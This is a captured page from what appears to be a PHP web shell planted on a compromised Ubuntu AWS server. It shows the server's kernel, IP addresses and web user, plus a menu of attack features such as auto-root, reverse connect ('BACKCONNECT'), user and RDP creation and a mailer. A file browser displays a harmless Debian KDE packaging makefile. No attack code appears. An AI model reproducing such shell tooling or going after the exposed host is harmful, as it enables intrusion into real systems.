Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.84.128
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
pkg-kde-tools /
qt-kde-team /
1 /
[ HOME SHELL ]
Name
Size
Permission
Action
policy
[ DIR ]
drwxr-xr-x
debian-qt-kde.mk
3.8
KB
-rw-r--r--
library-packages.mk
1.47
KB
-rw-r--r--
policy.mk
1.27
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : policy.mk
# policy.mk must be included from debian_qt_kde.mk ifdef _cdbs_debian_qt_kde include /usr/share/cdbs/1/rules/buildvars.mk DEB_KDE_DISTRIBUTION := $(shell dpkg-parsechangelog | grep '^Distribution: ' | sed 's/^Distribution: \(.*\)/\1/g') DEB_KDE_MAJOR_VERSION := $(shell echo "$(DEB_UPSTREAM_VERSION)" | cut -d. -f1-2) DEB_KDE_MAINTAINER_CHECK := $(shell grep -e '^Maintainer:.*<debian-qt-kde@lists\.debian\.org>[[:space:]]*$$' \ -e '^XSBC-Original-Maintainer:.*<debian-qt-kde@lists\.debian\.org>[[:space:]]*$$' debian/control) # Distribution-specific policy file may not exist. It is fine ifeq (,$(filter $(DEB_KDE_DISTRIBUTION),$(DEB_KDE_DISABLE_POLICY_CHECK))) -include $(DEB_PKG_KDE_QT_KDE_TEAM)/policy/$(DEB_KDE_DISTRIBUTION).mk endif # Reject packages not maintained by Debian Qt/KDE Maintainers ifeq (,$(DEB_KDE_MAINTAINER_CHECK)) $(info ### debian_qt_kde.mk can only be used with packages (originally) maintained by) $(info ### Debian Qt/KDE Maintainers, please read /usr/share/pkg-kde-tools/qt-kde-team/README) $(info ### for more details. Please read /usr/share/doc/pkg-kde-tools/README.Debian for more) $(info ### information on how to use pkg-kde-tools with other KDE packages.) $(error debian_qt_kde.mk usage denied by policy.) endif endif
Close